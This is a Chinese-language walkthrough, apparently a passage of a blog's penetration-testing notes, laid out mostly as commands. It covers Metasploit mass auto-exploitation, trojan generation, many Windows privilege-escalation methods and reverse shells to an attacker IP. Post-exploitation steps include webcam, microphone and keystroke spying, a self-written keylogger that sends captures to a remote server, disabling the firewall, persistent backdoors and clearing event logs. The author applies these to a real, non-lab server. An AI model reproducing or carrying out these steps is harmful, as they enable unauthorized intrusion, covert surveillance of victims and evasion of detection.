hosts

vulns

漏洞信息都上传到msfconsole了。

cd /usr/share/metasploit-framework/plugins/

sudo wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

打开另外一个终端下载，自动攻击db

load db_autopwn

db_autopwn -t -p -e -r

正在批量自动化攻击反弹shell

结果不是很好，并没有反弹shell成功。虽然没成功毕竟不是靶机，但我们也学习到了如何利用漏洞。

我们接下来就登陆漏洞和爆破拿到的test test123账号密码去进行提权

木马生成

Venom架构(虽然可以绕，但是问题很多)

sudo apt-get install xterm

git clone https://github.com/r00t-3xp10it/venom.git

mkdir -p ~/Tools &&mv venom ~/Tools/ &&cd ~/Tools/venom

find ./ -name "*.sh" -exec chmod +x {} \;

find ./ -name "*.py" -exec chmod +x {} \;

cd aux &&sudo ./setup.sh

/usr/share/metasploit-framework #库安装目录位置,根据自己实际情况去定

/var/www/html #设置AP目录(apache2 webserver)

/opt/.wine #输入.wine 目录路径

#zenity: relocation error: /usr/lib/x86_64-linux-gnu/libxslt.so.1: symbol xmlBufContent version LIBXML2_2.9.0 not defined in file libxml2.so.2 with link     time reference #发现配置依赖过程中出现zenity按自己实际情况操作下面命令，要注意看自己是什么版本的libxml操作下面。

mv /usr/local/lib/libxml 2.so.2.7.8 /usr/local/lib/libxml2.so.2.7.8_bak

mv /usr/local/lib/libxml2.so.2 /usr/local/lib/libxml2.so.2_bak

ln -s /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.4 /usr/local/lib/libxml2.so.2

另外注意，在parrot系统中，root用户无法直接使用systemctl start apache2.service开启apache等服务，

必须普通用户才行。否则会提示

#systemctl restart apache2.service

#Failed to restart apache2.service: Access denied

#See system logs and 'systemctl status apache2.service' for details.

cd ..

sudo ./venom.sh -u

这里说明下，要根据目标的系统类型去选择，我的目标是64位操作系统则选择windows/x64

其他的都默认提示选或者自己填

提权

1.sc其实跟net 等都是管理服务的一种工具，所有服务都是由system系统最高权限去执行

sc Create syscmd binPath= "cmd /K start" type= own type= interact

我通过sc去获得一个交互式的cmd命令框既管理权限,不过在安全强度大的计算机是行不通的

2.at时间执行跟上面原理相似，同样是由system执行，但是如果上面失败了，这个也行不通

at 11:15 /interactive cmd

3.net命令直接提权

net localgroup administrators test

成功率极低

4.在kali操作监听目标端口

nc XXXXXX.com 10023

但是需要关闭对方防火墙，由于你没权限所以无法做到，但是我还是做了示范 netsh advfirewall set currentprofile state off,需要powershell执行才能全部关闭

5.上传木马漏洞提权

先上传无密码登陆的公钥

sftp -P10023 test@xxxx.com

put -r Tools/venom/output/5cmd64.exe

这里说明下，由于sftp的通道是建立在ssh也就是说传输的位置就会在,ssh 传输windows稍微麻烦点，我们用sftp也是用ssh通道的E:\SSH\home\test\5cmd.exe.

之后我会专门做一期高度免杀的木马，由于内容比较繁琐，所以你们尽量用靶机测试，我的服务器是配置了火绒 已经免杀了可以看到.准备好监听

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp)

set LHOST 192.168.0.111

set LPORT 666

exploit

监听好

ssh -p10023 test@xxxxx.com "/home/test/5cmd64.exe"

发送一条远程执行命令,这里必须强调一点，SSH尽量安装在C盘，否则会出现各种不必要的权限问题

拿到反弹shell，但是还是普通用户

各种颅内高潮提权操作

1.最简单但也是最危险的操作，如果对方有像火绒一样的就会察觉并且封杀你的木马，导致你无法再次登录。

getsystem

2.exp溢出提权漏洞 ms10_073_kbdlayout

background

我们先在meterpreter输入:background 后台放置，方便我们非关闭会话

我们直接sessions 1就能回到meterpreter

search ms10_073_kbdlayout

use post/windows/escalate/ms10_073_kbdlayout

options

set SESSION 1

exploit

sessions 1

或者直接在meterpreter执行 run post/windows/escalate/ms10_073_kbdlayout

目标系统不易受攻击 也就没有这方面的漏洞。OK我们试下一个

3.盗取令牌 直接在meterpreter操作

use incognito

进入模块

list_tokens -u

依旧失败，我们只有目前爆破的用户的口令，不过下面示范下如何获取口令

impersonate_token "NT AUTHORITY\\SYSTEM"

用户前面需要添加两个\\

meterpreter中文乱码

chcp 65001

如果你已经拿到了system shell那么你就跳过提权步骤，转到下方操作后续。

4.Bypassuac 绕过用户控制漏洞

为了远程执行目标的exe或者bat可执行文件绕过此安全机 UAC(UserAccount Control，用户账户控制)

简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。

background

search bypassuac

use exploit/windows/local/bypassuac

show options

set session 1

exploit

成功后会返回一个新的session，进入新会话，发现权限没变，使用getsystem即可完成提权

5.HASH

run post/windows/gather/hashdump

run post/windows/gather/smart_hashdump

抓取密码,被拒绝访问了。如果成功了就可以通过执行下面命令提权

background

use exploit/windows/smb/psexec

options

set rhost xxxx.com

set SMBuser 我们捕获的hash用户名

set SMBPass HASH值

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.111

set lport 4444

exploit

关于john the ripper暴力破解

6.Service Permissions 服务权限漏洞

use exploit/windows/local/service_permissions

options

set session 1

run

这个漏洞可以针对 OS   : Windows 10 (10.0 Build 19041). Architecture    : x64

7. 内置漏洞提取以及运用

use post/multi/recon/local_exploit_suggester

set session 1

run

发现有3个漏洞可以直接利用

8.柳暗花明(enum_services利用)

use post/windows/gather/enum_services

set session 1

run

shell

cacls E:\Huorong\Sysdiag\bin\wsctrlsvc.exe

好吧我们看到的这个服务是火绒，太岁头上动土，哈哈。查看这个服务的权限，发现到这个服务是允许普通用户修改的。我把服务换成我们木马重启的时候就可以上线了。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=668 -f exe-service -o wsctrlsvc.exe

upload /home/kali/wsctrlsvc.exe "E:\\Huorong\\Sysdiag\\bin\\wsctrlsvc.exe"

权限不足,拒绝访问，原因很简单，杀毒软件不是这么容易改的，所以真能认了，但是后面还是模拟一下成功后的操作。

net start wsctrlsvc.exe

sessions

9. 凭证存储 Windows7之后的操作系统提供了windows保险柜功能

Window保险柜存储Windows可以自动登录用户的凭据，这意味着需要凭据才能访问资源(服务器或网站)的任何Windows应用程序都可以使用此凭据管理器和Windows Vault并使用提供的凭据代替用户一直输入用户名和密码。

cmdkey /list

runas来以管理员权限启动nc反弹shell。

Runas /user:administrator /savecred "nc.exe -e cmd.exe 192.168.0.111 4433"

nc -lvvp 4433

10.使用Potato(烂土豆) 窃取system 令牌并模仿令牌

git clone https://github.com/foxglovesec/Potato.git

cd Potato/source/Potato/Potato/obj/Release

把它丢到WINDOWS中，在meterpreter操作

use incognito

list_tokens -u

发现还没有system权限的令牌

execute -cH -f ./potato.exe

impersonate_token "NT AUTHORITY\\SYSTEM"

shell

whoami

whoami /priv

EXP原理浅析

1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。2.对这个认证过程使用中间人攻击(NTLM重放)，为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限，大多数用户级的账户没有这个权限。

11.永恒之蓝(ms17-010)提权针对win7

use exploit(windows/smb/ms17_010_eternalblue

set rhosts xxxx.com

run

12.流氓 沾滞键提权漏洞 在meterpreter下执行

run post/windows/manage/sticky_keys

在 RDP(3389远程桌面) or UAC(用户账号控制)模式下连续按5次 Shift键就会提权system

常用meterpreter简单测试命令

摄像头

列表

webcam_list

快照

webcom_snap

录像停止 run webcom -s

run webcom -p /var/www/

实时摄像头传输直播

webcam_stream

截屏

screenshot

鼠标键盘控制权，-h详细命令

uictl -h

视频聊天，对方会弹窗

webcam_chat

麦克风记录5秒 -p 默认为true自动播放

record_mic -d 5 -p false

远程控制：要求管理权限，如果没有权限，可以参考上面提权。

查看状态

enumdesktops

查看可用的session

getdesktop

与meterpreter关联session

setdesktop

设置meterpreter关联session

开启远程3389端口rdp

run post/windows/manage/enable_rdp USERNAME=rdpTest PASSWORD=123 FORWARD=true LPORT=6662

第一种：开启远程端口

run getgui -u rdpTest -p 123 -f 777

第二种：我们启动远程 上面是建立一个,允许账号rdpTest 密码123登陆 3389端口转发到777  run getgui -e纯开启远程端口,

结果就会创建一个名为rdpTest的拥有管理权限的用户

run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__xxxxx.rc

我们运行上面命令就会清理掉远程信息包含rdpTest管理员账户

如果以上方法都无法开启3389则在下面执行

shell

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

注册表开启远程端口，把后面的000.....改成11111111则关闭

连接3389端口

rdesktop -e -u "rdpTest" -p "123" 192.168.0.142:3389

远程控制run VNC

run vnc

虽然远程桌面打开了，但是依旧无法控制。解决办法如下

sudo vim /usr/share/metasploit-framework/scripts/meterpreter/vnc.rb

添加到111和104行：

pay.datastore['ViewOnly'] = false

我们需要修改meterpreter下的vnc.rb配置 位置在111行 和104行添加

键盘监听记录

meterpreter内置的记录，但是不能自动保存，缺点

keyscan_start

监听开始

keyscan_dump

下载记录内容

这里注意了，内置的记录它不会显示中文只会用特殊符号表示。停止记录

keyscan_stop

进阶监听系统登录信息，账号密码。

ps |grep winlogon

migrate 924

keyscan_start

我们通过迁移进程PID，去记录用户登录系统账号密码信息。

模块运用post/windows/capture/keylog_recorder 保存键盘记录

ps |grep QQ

migrate 2088

run keylog_recorder

我们将meterpreter迁移到QQ，当QQ开启的时候meterpreter也同时启动。

监听到的结果都会保存到红线文件中，就解决了meterpreter内置不能保存的问题。

模块迁移meterpreter

run post/windows/manage/migrate

我们可以看到模块帮我们迁移到笔记本，隶属于system组

自己的项目用于替代meterpreter内置外置的键盘鼠标监听

离开了几个星期的时间，去开发了个项目去替代meterpreter的键盘监听，这个项目定义名 KBMonitor,现在终于完成项目回来了。做着这个笔记总觉得上面两种键盘监听太鸡肋，所以头脑发热开发了个。版本从1.0更新至2.0，目前BUG问题较少可以放心使用。

git clone https://github.com/EternalNight996/KBMonitor.git

源码和成品我都放在github上面，执行上面命令就可以全部下载。成品双击执行即可，但是有方法，还是得看看博客怎么使用。项目分四部分

1.windows监控端 2.windows监控传输端 3.windows服务端  4.linux服务端。。。。其功能十分强大，可以监控任意你想监控的软件浏览器，并截屏。实时回传服务端。

我们现在拿到了管理员权限，则就可以放置一个实时监听，再设置每次重启就会打开。。。下面我将演示利用这个软件怎么达到一个实时不间断控制。

git clone https://github.com/EternalNight996/KBMonitor.git

cd KBMonitor/output/LinuxServer

python3 SocketLinuxServer.py

配置自己服务器也就是本机的IP或者域名，以及端口。会生成一个目录和文件，将Monitor_config.txt文件复制到windows客户端

打开另一个终端执行

cp KBMonitor/output/LinuxServer/Monitor_config.txt KBMonitor/output/WinClient/Monitor_config.txt

这时候我们就将客户端发送到目标电脑。在meterpreter执行下面命令

getlwd

mkdir D:\\Mycode

upload -r /home/kali/myProject/venvs/KBMonitor/output/WinClient D:\\Mycode\\

shell

cd /d D:\\Mycode\\

run.vbs

我打开QQ输入账号密码，

开启防火墙,两种方法

netsh advfirewall set currentprofile state on

netsh firewall set opmode mode=enable

关闭防火墙,两种方法

netsh advfirewall set currentprofile state off

netsh firewall set opmode mode=disable

还原策略默认值

netsh advfirewall reset

添加防火墙进出规则，目标我们的meterpreter木马和我们的监控项目

netstat -ano

netsh advfirewall firewall add rule name="allow667inport" protocol=TCP dir=in localport=667 action=allow

netsh advfirewall firewall add rule name="allow667outport" protocol=TCP dir=out localport=667 action=allow

netsh advfirewall firewall add rule name="allow6667inport" protocol=TCP dir=in localport=6667 action=allow

netsh advfirewall firewall add rule name="allow6667outport" protocol=TCP dir=out localport=6667 action=allow

meterpreter持续后门

Persistence

-A

自动启动一个匹配exploit /multi/handler来连接到代理

-L

如果未使用%TEMP%则在目标主机中写入有效负载的位置

-P

有效负载使用，默认为windows / meterpreter / reverse_tcp。

-S

作为服务自动启动该木马(具有SYSTEM权限)

-T

要使用的备用可执行模板

-U

用户登录时自动启动该木马

-X

系统引导时自动启动该木马

-i

每次连接尝试之间的时间间隔(秒)

-p

运行Metasploit的系统正在侦听的端口

-r

运行Metasploit监听连接的系统的IP

run persistence -X -i 5 -p 4466 -r 192.168.0.111

metsvc

命令运行成功后会在C:WindowsTEMP目录下新建随机名称的文件夹，里面生成3个文件(metsvc.dll、metsvc-server.exe、metsvc.exe)。

同时会新建一个服务，显示名称为Meterpreter，服务名称为metsvc，启动类型为”自动”,绑定在31337端口。

-A

安装后门后，自动启动exploit/multi/handler模块连接后门

-r

删除后门

run metsvc -A

清除日志战斗痕迹

clearev

exit

session -K

TO THE END